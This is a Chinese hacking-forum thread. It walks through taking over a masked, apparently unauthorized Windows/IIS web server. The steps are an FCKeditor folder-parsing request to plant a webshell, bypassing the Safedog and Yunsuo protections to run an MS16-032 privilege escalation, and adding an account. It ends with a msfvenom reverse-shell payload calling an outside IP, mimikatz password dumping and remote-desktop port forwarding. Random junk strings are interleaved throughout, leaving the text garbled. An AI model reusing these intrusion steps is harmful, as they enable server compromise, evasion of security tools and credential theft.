找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2104|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 W4 R3 X0 q0 w9 G) E

$ \" Y. z0 S& P3 X" O+ ^* ~& O, t: P' h5 w8 @# U' i& u7 }- I+ }6 ]* U! z1 w2 s9 h: Z7 k8 W9 i' o T( I5 t7 m6 o c" i3 o6 U W9 o( v( K* i+ i% m% U) q: d& G. m- O
+ R6 t6 ^' \3 r* o1 W- E

- N9 [2 Z0 l' c* T3 n4 {- x
# _5 h X! e- l* I$ Y6 }' n- P 一、 利用getwebshell
3 s* Y; I, R2 B' p
0 \( N7 a4 Z: R0 E U# F$ S 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
/ y8 E! X. t1 C1 O1 ?- y
" ~1 C. [$ x# f4 }222.png
$ P# P j, @ ?7 S* o) p 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
6 x- h' F& m" a1 u+ j+ }333.png
8 h: {% U5 I" E8 v( h下面我们构造一个asp目录,如: 4 v( m( H w3 V. Z% s- A2 [5 @+ S% |

- c$ q5 M f% y( l" Y

; |% K" |, j1 j/ T% I2 e: w; M http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 2 k' s# S6 f5 q; _8 b

6 ~3 e1 L8 C7 N; W

, t0 W- x) Y+ {0 p" F" H6 n 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
( n0 z4 N) b/ @. z9 i! `" A- c
& @0 r" [4 E6 c% O1 w2 h一、 绕过安全狗云锁提权并且加账号
5 S9 l+ w/ K# t+ `9 V) Z444.png
4 z2 B1 |" v4 y4 z* G! R% V没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
& W+ t- n9 Z" m
. ?3 m3 H) _/ C( l6 O4 U9 Y) w+ ^如图:
" l( b* u" W* G) }+ H0 C- K6 s 555.png
7 r, F( F0 z ?8 \. i/ [. j2 \& J, K 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
2 _" |3 M P! ]9 O
# l& R; Q: T" c$ Y 一、 利用metasploit
Z. Z$ M g5 v
! `; C9 ~8 y( c# E- l# @$ R% T 首先用pentestbox生成一个64位的payload如下命令
8 z! z1 v* e. g: X
* n2 S9 K6 A* b+ e0 RmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
$ t9 Z8 |( @8 U3 {
: a% n7 P4 F4 n为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
0 p% k7 } L; v! z- n6 M$ \1 U11.png
( m0 k! d' |5 }% I" Z; c) I; R) C下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
/ _! F" q" V8 Y7 e% _) L13.png
3 L- l# b* N/ y& N: h. U; i下面我们来做一个监听如下命令:
4 V* l- y2 I7 G% h) y$ ]3 o7 \
* ?6 W- }7 L: y( x" M Qportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
% \1 c- Y" X% s 18.png . ?) Q8 q% E' Y1 E5 @! c

2 _" z0 @, ~% V' c" R9 X
3 a; [1 A# V5 V+ d" V3 ]5 B

7 W: I( Q/ X0 {) p2 f

) q; W* F7 F$ Q" ^- n& R
" S6 F, t2 j* M# [
2 q: Z5 U$ J2 r6 n" |0 @; M / c% {6 h# I4 a* d" f

7 J& ^8 U6 J( v$ G' L1 B6 W
E6 s0 B2 {# e2 ` # }2 f" N- M. W R9 N+ ?

. c& d8 t' S6 n+ y# [; v" C8 R
9 O0 i; c: m! W7 d- i t4 r

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表